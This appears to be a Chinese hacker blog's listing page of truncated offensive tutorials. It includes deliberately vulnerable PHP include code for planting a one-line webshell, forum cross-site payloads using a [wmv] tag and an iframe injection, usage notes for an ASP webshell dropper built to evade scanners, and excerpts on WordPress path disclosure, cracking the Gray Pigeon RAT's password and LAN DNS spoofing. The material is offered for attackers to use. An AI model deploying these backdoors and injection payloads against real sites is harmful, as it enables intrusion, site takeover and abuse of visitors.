来源:amxku blog
首先建立一PHP文件test.php 文件内容为:
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt 如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端木马地址添入 http://localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了,执行返回的结果都可以看到。
阅读全文 »
Tags: BackDoor
信息来源:黑色技术小组
整理编辑:B.S.T
只要把后面的域名改成你所要跳转的域名就可以了…
支持wmv的论坛如下发帖:
[wmv=314,256,1]http://www.rootkit.com.cn/qq.swf?url=http://www.rootkit.com.cn[/wmv]
其他论坛跨站方法大家自己灵活运用了….
比如 mp3 wmv flash rm 等代码的支持格式都可以试一下
Tags: PHPWind,
跨站
跨站代码:
:</title><iframe src=http://www.huaidan.org/ width=400 height=300></iframe>
效果:
Tags: 百度知道,
跨站
来源:0DAY的BLOG
使用方法:
直接访问xxx.asp?bin=zs 会在当前目录下生成一个bin.asp.连接密码为zs!
PS: 该文件可以躲避ScanWebShell,但是生成的bin.asp会被查杀,使用后请删除bin.asp!
阅读全文 »
作者:angel
来源:4ngel's blog
wordpress 2.1.2 以及之前的版本
今天看了看wordpress模板的机制,发现存在了漏洞。大家可以认为这个漏洞不要紧。但是配合其他漏洞可以拿下WEB空间。权限允许可以拿下主机。
好久没有写漏洞的文章了,忘记格式了,呵呵,随便写写。
wordpress的模板文件,缺少访问验证,直接访问模板里的文件,就会泄露物理路径。这个不是PHP漏洞,是WordPress的漏洞。
比如访问:http://hostname/wordpress/wp-content/themes/default
就会显示:
Fatal error: Unknown function: get_header() in /home/publi 阅读全文 »
Tags: WordPress,
漏洞
作者:黑侠(Black Mask)
来源:Black Mask'blog
文章已发表在《黑客X档案》2006年11期杂志上,转载请注明
灰鸽子对大家来说并不陌生吧,他强大的功能都令各位黑友爱不释手,今天主要来讨论一下,如何破解灰鸽子的连接密码。以下方法主要针对于2005版的灰鸽子。
一、追出加密后的连接密码
首先我就在本机配置一个鸽子的服务端,域名用xtaflf.vicp.net,连接密码为0348088,然后在本地运行,因为在鸽子主程序生成服务端的时候,密码就已经加密成一个16位的MD5变位的密文配置到服务端里面,用网上下载来的MD5破解软件是破解不出来(因为是变位的MD5加密),所以在服务端里是找不出明文密码的,但是我们可以把加密后的密码找出来吧,好,我们打开“WinHex”点击“打开RAM”,找到 阅读全文 »
Tags: 灰鸽子
作者:黑侠(Black Mask)
来源:Black Mask'blog
文章已经发表于<<黑客X档案>>2006年10期,转载请注明!
DNS域名欺骗,相信许多朋友都听说过了吧,也经常会听到一些某某大站遭到DNS欺骗攻击,而导致网站不能被用户所正常浏览,那么难道某某大站真的被入侵了吗?其实情况并不是这样的,他们的网站并没有真正的被入侵,而是他们的域名被所黑客劫持,当用户浏览他们的网站时,发现主页怎么变成其他的内容了。其实DNS欺骗并非只能在广域网里实现,而在局域网里也能够实现,并且更加容易些。下面我们来看看局域网中是如何进行DNS域名欺骗的。
一、DNS欺骗原理
下面我将对IP地址为192.168.0.100主机进行DNS欺骗,首先来看一下我们本地的IP配置情况,如图1,
阅读全文 »
Tags: DNS